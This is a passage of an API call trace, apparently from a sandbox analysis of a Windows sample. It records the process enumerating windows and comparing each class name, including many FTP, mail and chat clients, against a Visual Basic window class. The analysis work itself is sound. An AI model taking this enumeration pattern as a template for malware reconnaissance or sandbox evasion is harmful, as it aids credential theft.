lpClassName="winscp_") returned 7 [0232.013] lstrcmpA (lpString1="winscp_", lpString2="ThunderRT6Main") returned 1 [0232.013] GetWindowThreadProcessId (in: hWnd=0x20284, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf58 [0232.013] GetWindow (hWnd=0x20284, uCmd=0x2) returned 0x1028a [0232.013] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.013] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.013] GetWindowThreadProcessId (in: hWnd=0x1028a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf58 [0232.013] GetWindow (hWnd=0x1028a, uCmd=0x2) returned 0x3027e [0232.013] GetClassNameA (in: hWnd=0x3027e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="whatsapp_cls") returned 12 [0232.013] lstrcmpA (lpString1="whatsapp_cls", lpString2="ThunderRT6Main") returned 1 [0232.013] GetWindowThreadProcessId (in: hWnd=0x3027e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf84 [0232.013] GetWindow (hWnd=0x3027e, uCmd=0x2) returned 0x10286 [0232.013] GetClassNameA (in: hWnd=0x10286, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.013] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.013] GetWindowThreadProcessId (in: hWnd=0x10286, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf84 [0232.013] GetWindow (hWnd=0x10286, uCmd=0x2) returned 0x20280 [0232.013] GetClassNameA (in: hWnd=0x20280, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="webdrivewin") returned 11 [0232.014] lstrcmpA (lpString1="webdrivewin", lpString2="ThunderRT6Main") returned 1 [0232.014] GetWindowThreadProcessId (in: hWnd=0x20280, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xfd0 [0232.014] GetWindow (hWnd=0x20280, uCmd=0x2) returned 0x3027c [0232.014] GetClassNameA (in: hWnd=0x3027c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.014] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.014] GetWindowThreadProcessId (in: hWnd=0x3027c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xfd0 [0232.014] GetWindow (hWnd=0x3027c, uCmd=0x2) returned 0x2027a [0232.014] GetClassNameA (in: hWnd=0x2027a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="trillian_class") returned 14 [0232.014] lstrcmpA (lpString1="trillian_class", lpString2="ThunderRT6Main") returned 1 [0232.014] GetWindowThreadProcessId (in: hWnd=0x2027a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe20 [0232.014] GetWindow (hWnd=0x2027a, uCmd=0x2) returned 0x10282 [0232.014] GetClassNameA (in: hWnd=0x10282, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.014] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.014] GetWindowThreadProcessId (in: hWnd=0x10282, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe20 [0232.014] GetWindow (hWnd=0x10282, uCmd=0x2) returned 0x20274 [0232.014] GetClassNameA (in: hWnd=0x20274, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="thunderbird_cls") returned 15 [0232.014] lstrcmpA (lpString1="thunderbird_cls", lpString2="ThunderRT6Main") returned -1 [0232.014] GetWindowThreadProcessId (in: hWnd=0x20274, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe3c [0232.014] GetWindow (hWnd=0x20274, uCmd=0x2) returned 0x30270 [0232.014] GetClassNameA (in: hWnd=0x30270, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.014] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.014] GetWindowThreadProcessId (in: hWnd=0x30270, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe3c [0232.014] GetWindow (hWnd=0x30270, uCmd=0x2) returned 0x2026e [0232.014] GetClassNameA (in: hWnd=0x2026e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="smartftp_app") returned 12 [0232.014] lstrcmpA (lpString1="smartftp_app", lpString2="ThunderRT6Main") returned -1 [0232.014] GetWindowThreadProcessId (in: hWnd=0x2026e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf90 [0232.015] GetWindow (hWnd=0x2026e, uCmd=0x2) returned 0x10278 [0232.015] GetClassNameA (in: hWnd=0x10278, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.015] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.015] GetWindowThreadProcessId (in: hWnd=0x10278, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf90 [0232.015] GetWindow (hWnd=0x10278, uCmd=0x2) returned 0x2026a [0232.015] GetClassNameA (in: hWnd=0x2026a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="skype_wnd") returned 9 [0232.015] lstrcmpA (lpString1="skype_wnd", lpString2="ThunderRT6Main") returned -1 [0232.015] GetWindowThreadProcessId (in: hWnd=0x2026a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf44 [0232.015] GetWindow (hWnd=0x2026a, uCmd=0x2) returned 0x10272 [0232.015] GetClassNameA (in: hWnd=0x10272, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.015] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.015] GetWindowThreadProcessId (in: hWnd=0x10272, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf44 [0232.015] GetWindow (hWnd=0x10272, uCmd=0x2) returned 0x20268 [0232.015] GetClassNameA (in: hWnd=0x20268, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="scriptftp_window") returned 16 [0232.015] lstrcmpA (lpString1="scriptftp_window", lpString2="ThunderRT6Main") returned -1 [0232.015] GetWindowThreadProcessId (in: hWnd=0x20268, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf20 [0232.015] GetWindow (hWnd=0x20268, uCmd=0x2) returned 0x1026c [0232.015] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.015] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.015] GetWindowThreadProcessId (in: hWnd=0x1026c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf20 [0232.015] GetWindow (hWnd=0x1026c, uCmd=0x2) returned 0x20264 [0232.015] GetClassNameA (in: hWnd=0x20264, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="pidginapp") returned 9 [0232.015] lstrcmpA (lpString1="pidginapp", lpString2="ThunderRT6Main") returned -1 [0232.015] GetWindowThreadProcessId (in: hWnd=0x20264, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf14 [0232.015] GetWindow (hWnd=0x20264, uCmd=0x2) returned 0x10266 [0232.016] GetClassNameA (in: hWnd=0x10266, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.016] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.016] GetWindowThreadProcessId (in: hWnd=0x10266, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xf14 [0232.016] GetWindow (hWnd=0x10266, uCmd=0x2) returned 0x2025e [0232.016] GetClassNameA (in: hWnd=0x2025e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="outlook_window") returned 14 [0232.016] lstrcmpA (lpString1="outlook_window", lpString2="ThunderRT6Main") returned -1 [0232.016] GetWindowThreadProcessId (in: hWnd=0x2025e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xee0 [0232.016] GetWindow (hWnd=0x2025e, uCmd=0x2) returned 0x10262 [0232.016] GetClassNameA (in: hWnd=0x10262, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.016] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.016] GetWindowThreadProcessId (in: hWnd=0x10262, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xee0 [0232.016] GetWindow (hWnd=0x10262, uCmd=0x2) returned 0x1025c [0232.016] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="operamail_win") returned 13 [0232.016] lstrcmpA (lpString1="operamail_win", lpString2="ThunderRT6Main") returned -1 [0232.016] GetWindowThreadProcessId (in: hWnd=0x1025c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x3cc [0232.016] GetWindow (hWnd=0x1025c, uCmd=0x2) returned 0x10260 [0232.016] GetClassNameA (in: hWnd=0x10260, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.016] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.016] GetWindowThreadProcessId (in: hWnd=0x10260, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x3cc [0232.016] GetWindow (hWnd=0x10260, uCmd=0x2) returned 0x10258 [0232.016] GetClassNameA (in: hWnd=0x10258, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="notepad_app") returned 11 [0232.016] lstrcmpA (lpString1="notepad_app", lpString2="ThunderRT6Main") returned -1 [0232.016] GetWindowThreadProcessId (in: hWnd=0x10258, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2d4 [0232.016] GetWindow (hWnd=0x10258, uCmd=0x2) returned 0x2025a [0232.016] GetClassNameA (in: hWnd=0x2025a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.016] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.016] GetWindowThreadProcessId (in: hWnd=0x2025a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x2d4 [0232.016] GetWindow (hWnd=0x2025a, uCmd=0x2) returned 0x20254 [0232.016] GetClassNameA (in: hWnd=0x20254, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="ncftpapp") returned 8 [0232.016] lstrcmpA (lpString1="ncftpapp", lpString2="ThunderRT6Main") returned -1 [0232.016] GetWindowThreadProcessId (in: hWnd=0x20254, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1fc [0232.017] GetWindow (hWnd=0x20254, uCmd=0x2) returned 0x20256 [0232.017] GetClassNameA (in: hWnd=0x20256, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.017] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.017] GetWindowThreadProcessId (in: hWnd=0x20256, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1fc [0232.017] GetWindow (hWnd=0x20256, uCmd=0x2) returned 0x10250 [0232.017] GetClassNameA (in: hWnd=0x10250, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="leechftp_") returned 9 [0232.017] lstrcmpA (lpString1="leechftp_", lpString2="ThunderRT6Main") returned -1 [0232.017] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xab0 [0232.017] GetWindow (hWnd=0x10250, uCmd=0x2) returned 0x10252 [0232.017] GetClassNameA (in: hWnd=0x10252, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.017] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.017] GetWindowThreadProcessId (in: hWnd=0x10252, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xab0 [0232.017] GetWindow (hWnd=0x10252, uCmd=0x2) returned 0x1024c [0232.017] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="icqcls") returned 6 [0232.017] lstrcmpA (lpString1="icqcls", lpString2="ThunderRT6Main") returned -1 [0232.017] GetWindowThreadProcessId (in: hWnd=0x1024c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb08 [0232.017] GetWindow (hWnd=0x1024c, uCmd=0x2) returned 0x2024e [0232.017] GetClassNameA (in: hWnd=0x2024e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.017] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.017] GetWindowThreadProcessId (in: hWnd=0x2024e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb08 [0232.021] GetWindow (hWnd=0x2024e, uCmd=0x2) returned 0x10248 [0232.021] GetClassNameA (in: hWnd=0x10248, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="gmailnotifierpro_wnd") returned 20 [0232.022] lstrcmpA (lpString1="gmailnotifierpro_wnd", lpString2="ThunderRT6Main") returned -1 [0232.022] GetWindowThreadProcessId (in: hWnd=0x10248, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd64 [0232.022] GetWindow (hWnd=0x10248, uCmd=0x2) returned 0x2024a [0232.022] GetClassNameA (in: hWnd=0x2024a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.022] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.022] GetWindowThreadProcessId (in: hWnd=0x2024a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd64 [0232.022] GetWindow (hWnd=0x2024a, uCmd=0x2) returned 0x20242 [0232.022] GetClassNameA (in: hWnd=0x20242, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="foxmailincmail_app") returned 18 [0232.022] lstrcmpA (lpString1="foxmailincmail_app", lpString2="ThunderRT6Main") returned -1 [0232.022] GetWindowThreadProcessId (in: hWnd=0x20242, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd40 [0232.022] GetWindow (hWnd=0x20242, uCmd=0x2) returned 0x20246 [0232.022] GetClassNameA (in: hWnd=0x20246, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.022] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.022] GetWindowThreadProcessId (in: hWnd=0x20246, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xd40 [0232.022] GetWindow (hWnd=0x20246, uCmd=0x2) returned 0x10240 [0232.022] GetClassNameA (in: hWnd=0x10240, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="flingwnd") returned 8 [0232.022] lstrcmpA (lpString1="flingwnd", lpString2="ThunderRT6Main") returned -1 [0232.022] GetWindowThreadProcessId (in: hWnd=0x10240, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xbd0 [0232.022] GetWindow (hWnd=0x10240, uCmd=0x2) returned 0x10244 [0232.022] GetClassNameA (in: hWnd=0x10244, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.022] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.022] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xbd0 [0232.022] GetWindow (hWnd=0x10244, uCmd=0x2) returned 0x1023c [0232.022] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="flashfxp_") returned 9 [0232.022] lstrcmpA (lpString1="flashfxp_", lpString2="ThunderRT6Main") returned -1 [0232.022] GetWindowThreadProcessId (in: hWnd=0x1023c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c4 [0232.022] GetWindow (hWnd=0x1023c, uCmd=0x2) returned 0x2023e [0232.022] GetClassNameA (in: hWnd=0x2023e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.022] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.022] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x9c4 [0232.023] GetWindow (hWnd=0x2023e, uCmd=0x2) returned 0x20236 [0232.023] GetClassNameA (in: hWnd=0x20236, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="filezilla_app") returned 13 [0232.023] lstrcmpA (lpString1="filezilla_app", lpString2="ThunderRT6Main") returned -1 [0232.023] GetWindowThreadProcessId (in: hWnd=0x20236, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc68 [0232.023] GetWindow (hWnd=0x20236, uCmd=0x2) returned 0x2023a [0232.023] GetClassNameA (in: hWnd=0x2023a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.023] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.023] GetWindowThreadProcessId (in: hWnd=0x2023a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc68 [0232.023] GetWindow (hWnd=0x2023a, uCmd=0x2) returned 0x401b6 [0232.023] GetClassNameA (in: hWnd=0x401b6, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="far_") returned 4 [0232.023] lstrcmpA (lpString1="far_", lpString2="ThunderRT6Main") returned -1 [0232.023] GetWindowThreadProcessId (in: hWnd=0x401b6, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb50 [0232.023] GetWindow (hWnd=0x401b6, uCmd=0x2) returned 0x10238 [0232.023] GetClassNameA (in: hWnd=0x10238, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.023] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.023] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb50 [0232.023] GetWindow (hWnd=0x10238, uCmd=0x2) returned 0x3007e [0232.023] GetClassNameA (in: hWnd=0x3007e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="coreftpcls") returned 10 [0232.023] lstrcmpA (lpString1="coreftpcls", lpString2="ThunderRT6Main") returned -1 [0232.023] GetWindowThreadProcessId (in: hWnd=0x3007e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc1c [0232.023] GetWindow (hWnd=0x3007e, uCmd=0x2) returned 0x10234 [0232.023] GetClassNameA (in: hWnd=0x10234, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.023] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.023] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xc1c [0232.023] GetWindow (hWnd=0x10234, uCmd=0x2) returned 0x20082 [0232.023] GetClassNameA (in: hWnd=0x20082, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="bitkinexwindow") returned 14 [0232.023] lstrcmpA (lpString1="bitkinexwindow", lpString2="ThunderRT6Main") returned -1 [0232.023] GetWindowThreadProcessId (in: hWnd=0x20082, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe60 [0232.023] GetWindow (hWnd=0x20082, uCmd=0x2) returned 0x3006a [0232.023] GetClassNameA (in: hWnd=0x3006a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.023] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.024] GetWindowThreadProcessId (in: hWnd=0x3006a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe60 [0232.024] GetWindow (hWnd=0x3006a, uCmd=0x2) returned 0x20084 [0232.024] GetClassNameA (in: hWnd=0x20084, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="barca_window") returned 12 [0232.024] lstrcmpA (lpString1="barca_window", lpString2="ThunderRT6Main") returned -1 [0232.024] GetWindowThreadProcessId (in: hWnd=0x20084, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe80 [0232.024] GetWindow (hWnd=0x20084, uCmd=0x2) returned 0x30080 [0232.024] GetClassNameA (in: hWnd=0x30080, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.024] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.024] GetWindowThreadProcessId (in: hWnd=0x30080, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe80 [0232.024] GetWindow (hWnd=0x30080, uCmd=0x2) returned 0x20058 [0232.024] GetClassNameA (in: hWnd=0x20058, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="alftp_win") returned 9 [0232.024] lstrcmpA (lpString1="alftp_win", lpString2="ThunderRT6Main") returned -1 [0232.024] GetWindowThreadProcessId (in: hWnd=0x20058, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xbe0 [0232.024] GetWindow (hWnd=0x20058, uCmd=0x2) returned 0x30076 [0232.024] GetClassNameA (in: hWnd=0x30076, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.024] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.024] GetWindowThreadProcessId (in: hWnd=0x30076, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xbe0 [0232.024] GetWindow (hWnd=0x30076, uCmd=0x2) returned 0x20056 [0232.024] GetClassNameA (in: hWnd=0x20056, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="absolutetelnet_cls") returned 18 [0232.024] lstrcmpA (lpString1="absolutetelnet_cls", lpString2="ThunderRT6Main") returned -1 [0232.024] GetWindowThreadProcessId (in: hWnd=0x20056, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x954 [0232.024] GetWindow (hWnd=0x20056, uCmd=0x2) returned 0x3005a [0232.024] GetClassNameA (in: hWnd=0x3005a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.024] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.024] GetWindowThreadProcessId (in: hWnd=0x3005a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x954 [0232.024] GetWindow (hWnd=0x3005a, uCmd=0x2) returned 0x7007c [0232.024] GetClassNameA (in: hWnd=0x7007c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="3dftpcls") returned 8 [0232.024] lstrcmpA (lpString1="3dftpcls", lpString2="ThunderRT6Main") returned -1 [0232.024] GetWindowThreadProcessId (in: hWnd=0x7007c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb54 [0232.024] GetWindow (hWnd=0x7007c, uCmd=0x2) returned 0x50086 [0232.025] GetClassNameA (in: hWnd=0x50086, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.025] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.025] GetWindowThreadProcessId (in: hWnd=0x50086, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xb54 [0232.025] GetWindow (hWnd=0x50086, uCmd=0x2) returned 0x3006c [0232.025] GetClassNameA (in: hWnd=0x3006c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Understood_Document_translations_class") returned 38 [0232.025] lstrcmpA (lpString1="Understood_Document_translations_class", lpString2="ThunderRT6Main") returned 1 [0232.025] GetWindowThreadProcessId (in: hWnd=0x3006c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe10 [0232.025] GetWindow (hWnd=0x3006c, uCmd=0x2) returned 0x30072 [0232.025] GetClassNameA (in: hWnd=0x30072, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.025] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.025] GetWindowThreadProcessId (in: hWnd=0x30072, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe10 [0232.025] GetWindow (hWnd=0x30072, uCmd=0x2) returned 0x30064 [0232.025] GetClassNameA (in: hWnd=0x30064, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Scuba_app") returned 9 [0232.025] lstrcmpA (lpString1="Scuba_app", lpString2="ThunderRT6Main") returned -1 [0232.025] GetWindowThreadProcessId (in: hWnd=0x30064, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe14 [0232.025] GetWindow (hWnd=0x30064, uCmd=0x2) returned 0x3007a [0232.025] GetClassNameA (in: hWnd=0x3007a, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.025] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.025] GetWindowThreadProcessId (in: hWnd=0x3007a, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe14 [0232.025] GetWindow (hWnd=0x3007a, uCmd=0x2) returned 0x3006e [0232.025] GetClassNameA (in: hWnd=0x3006e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="BufRemindUnderwearapp") returned 21 [0232.025] lstrcmpA (lpString1="BufRemindUnderwearapp", lpString2="ThunderRT6Main") returned -1 [0232.025] GetWindowThreadProcessId (in: hWnd=0x3006e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe1c [0232.025] GetWindow (hWnd=0x3006e, uCmd=0x2) returned 0x20068 [0232.025] GetClassNameA (in: hWnd=0x20068, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.025] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.025] GetWindowThreadProcessId (in: hWnd=0x20068, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe1c [0232.025] GetWindow (hWnd=0x20068, uCmd=0x2) returned 0x20060 [0232.025] GetClassNameA (in: hWnd=0x20060, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="printbondsbabywnd") returned 17 [0232.025] lstrcmpA (lpString1="printbondsbabywnd", lpString2="ThunderRT6Main") returned -1 [0232.025] GetWindowThreadProcessId (in: hWnd=0x20060, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdac [0232.026] GetWindow (hWnd=0x20060, uCmd=0x2) returned 0x20054 [0232.026] GetClassNameA (in: hWnd=0x20054, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.026] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.026] GetWindowThreadProcessId (in: hWnd=0x20054, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdac [0232.026] GetWindow (hWnd=0x20054, uCmd=0x2) returned 0x5005c [0232.026] GetClassNameA (in: hWnd=0x5005c, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Purchase_class") returned 14 [0232.026] lstrcmpA (lpString1="Purchase_class", lpString2="ThunderRT6Main") returned -1 [0232.026] GetWindowThreadProcessId (in: hWnd=0x5005c, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe18 [0232.026] GetWindow (hWnd=0x5005c, uCmd=0x2) returned 0x40050 [0232.026] GetClassNameA (in: hWnd=0x40050, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.026] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.026] GetWindowThreadProcessId (in: hWnd=0x40050, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xe18 [0232.026] GetWindow (hWnd=0x40050, uCmd=0x2) returned 0x501c4 [0232.026] GetClassNameA (in: hWnd=0x501c4, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="matt_Introduces_stretch_cls") returned 27 [0232.026] lstrcmpA (lpString1="matt_Introduces_stretch_cls", lpString2="ThunderRT6Main") returned -1 [0232.026] GetWindowThreadProcessId (in: hWnd=0x501c4, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xda4 [0232.026] GetWindow (hWnd=0x501c4, uCmd=0x2) returned 0x2005e [0232.026] GetClassNameA (in: hWnd=0x2005e, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="IME") returned 3 [0232.026] lstrcmpA (lpString1="IME", lpString2="ThunderRT6Main") returned -1 [0232.026] GetWindowThreadProcessId (in: hWnd=0x2005e, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xda4 [0232.026] GetWindow (hWnd=0x2005e, uCmd=0x2) returned 0x30220 [0232.026] GetClassNameA (in: hWnd=0x30220, lpClassName=0x33e4fb7d10, nMaxCount=64 | out: lpClassName="Fighting_wnd") returned 12 [0232.026] lstrcmpA (lpString1="Fighting_wnd", lpString2="ThunderRT6Main") returned -1 [0232.026] GetWindowThreadProcessId (in: hWnd=0x30220, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0xdf8 [0232.026] GetWindow (hWnd=0x30220, uCmd=0x2) returned 0x301be [0232.026] GetClassNameA (in: hWnd=0x301be, 